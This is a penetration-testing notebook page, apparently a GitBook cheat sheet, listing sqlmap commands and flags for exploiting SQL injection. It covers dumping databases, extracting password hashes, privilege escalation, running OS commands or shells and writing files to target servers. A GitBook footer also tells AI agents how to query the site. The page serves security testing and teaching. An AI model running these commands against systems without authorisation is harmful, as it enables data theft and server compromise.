> For the complete documentation index, see [llms.txt](https://book.redsquad.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.redsquad.xyz/web-hacking/injections/sqli/sqlmap.md).

# SQLmap

{% hint style="info" %}
**sqlmap** goal is to detect and take advantage of **SQL injection vulnerabilities** in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system **fingerprint**, **retrieve** DBMS **session** user and database, **enumerate** users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.
{% endhint %}

{% embed url="<https://thedarksource.com/sqlmap-cheat-sheet>" %}
SQLMap cheatsheet
{% endembed %}

### Dumping tables

{% embed url="<https://rnehra01.github.io/Dumping-tables-using-sqlmap>" %}

### Examples

* Target the *<http://target.server.com>* URL using the **-u** flag:

```bash
sqlmap -u 'http://target.server.com'
```

* Specify POST requests by specifying the **-data** flag:

```bash
sqlmap -u "http://10.10.155.76/login.php" -method "POST" -data "log_email=cun@gmail.com&log_password=123456&login_button=Login" --dbs
```

* Target a vulnerable parameter in an authenticated session by specifying cookies using the **-cookie** flag:

```bash
sqlmap -u 'http://target.server.com' --cookie='JSESSIONID=09h76qoWC559GH1K7D- SQHx'
```

* Drop all Set-Cookie requests from the target web server using the **-drop-set-cookie** flag:

```bash
sqlmap -u 'http://target.server.com' -r req.txt --drop-set-cookie
```

* Perform in-depth and risky attacks using the **-level** and **-risk** flags:

```bash
sqlmap -u 'http://target.server.com' --data='param1=blah' --level=5 --risk=3
```

* Specify which POST or GET parameter to target using the **-p** flag:

```bash
sqlmap -u 'http://target.server.com' --data='param1=blah&param2=blah' -p param1
```

* Choose a random User-Agent request header using the **–random-agent** flag:

```bash
sqlmap -u 'http://target.server.com' -r req.txt --random-agent
```

* Target a certain database service using the **–dbms** flag:

```bash
sqlmap -u 'http://target.server.com' -r req.txt --dbms Oracle
```

* Read a request (stored via Burpsuite) target the user parameter (and no other parameters), run risky queries, and dump users and passwords:

```bash
sqlmap -r ./req.txt -p user --level=1 --risk=3 --passwords
```

* Attempt privilege escalation on the target database

```bash
sqlmap -r ./req.txt --level=1 --risk=3 --privesc
Run the “whoami” command on the target server.
sqlmap -r ./req.txt --level=1 --risk=3 --os-cmd=whoami
```

Dump everything in the database, but wait one second in-between requests.

```bash
sqlmap -r ./req.txt --level=1 --risk=3 --dump --delay=1
```

### Post-Exploit

* Error-Based SQLi, dump all data from a MSSQL Database :

```bash
sqlmap -r req --technique=E -U <user> --level 5 --risk 3 --tamper=space2comment --dbms=MSSQL -D <db> --dump
```

### Flags

*Here are some useful options for your pillaging pleasure:*

`-r req.txt` Specify a request stored in a text file, great for saved requests from BurpSuite.

`--force-ssl` Force SQLmap to use SSL or TLS for its requests.

`--level=1` only test against the specified parameter, ignore all others.

`--risk=3` Run all exploit attempts, even the dangerous ones (could damage database).

`--delay` Set a delay in-between requests, great for throttled connections.

`--proxy` Set to <http://127.0.0.1:8080> to pipe requests through BurpSuite for inspection.

`--privesc` Attempt to elevate the privileges of the database service account.

`--all` Enumerate everything inside the target database.

`--hostname` Print the target database’s hostname.

`--passwords` Find and exfiltrate all users and their password hashes or digests.

`--dbs` Enumerate all databases accessible via the target webserver.

`--comments` Enumerate all found comments inside the database.

`--sql-shell` Return a SQL prompt for interaction.

`--os-cmd` Attempt to execute a system command.

`--os-shell` Attempt to return a command prompt or terminal for interaction.

`--reg-read` Read the specified Windows registry key value.

`--file-write` Specify a local file to be written to the target server.

`--file-dest` Specify the remote destination to write a file to.

`--technique=` Specify a letter or letters of BEUSTQ to control the exploit attempts:

* `B` : Boolean-based blind
* `E` : Error-based
* `U` : Union query-based
* `S` : Stacked queries
* `T` : Time-based blind
* `Q` : Inline queries


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.redsquad.xyz/web-hacking/injections/sqli/sqlmap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.